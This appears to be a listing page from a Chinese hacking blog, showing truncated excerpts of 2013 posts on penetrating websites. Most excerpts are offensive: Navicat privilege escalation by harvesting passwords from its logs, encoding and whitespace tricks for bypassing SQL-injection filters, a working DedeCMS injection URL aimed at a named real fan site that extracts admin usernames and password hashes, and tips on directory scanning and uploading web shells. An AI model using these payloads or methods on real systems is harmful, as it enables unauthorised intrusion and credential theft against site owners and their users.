WordPress免费主题问题多多

WordPress是一款知名的，拥有大量用户的开源建站程序，因为用户量大，所以针对WordPress的第三方未知来源主题站和主题论坛也非常多。下载一个现成的主题，简单几步就安装好了，省去了网站UI设计开发的步骤，这是众多站长的选择。但值得提醒的是，360网站安全检测平台发…

    669    2013-09-13   去围观

利用navicat提权

navicat是一个比较流行的MySQL管理工具，在很多服务器上都可以找到 有两个方法提权： 1、从日志文件里找密码，navicat会把操作日志（比如加账户）保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt，低版本是安装目录下的logs下LogHistory.txt 2、nav…

    444    2013-09-08   去围观

绕过防注入的11招

1、运用编码技术绕过 如URLEncode编码，ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 2、通过空格绕过 如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如 or' swords' =‘swords'，由于m…

    425    2013-09-07   去围观

渗透王力宏中文网织梦漏洞

那么直接用下面的exp [code]xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]…

    428    2013-08-14   去围观

网站渗透的一些经验

1.无论什么站，无论什么语言，我要渗透，第一件事就是扫目录，最好一下扫出个上传点，直接上传shell，诸位不要笑，有时候你花很久搞一个站，最后发现有个现成的上传点，而且很容易猜到，不过这种情况发生在asp居多！ 2.asp（aspx）+MSSQL先考虑注入，一般的注入都有DB…

    375    2013-08-13   去围观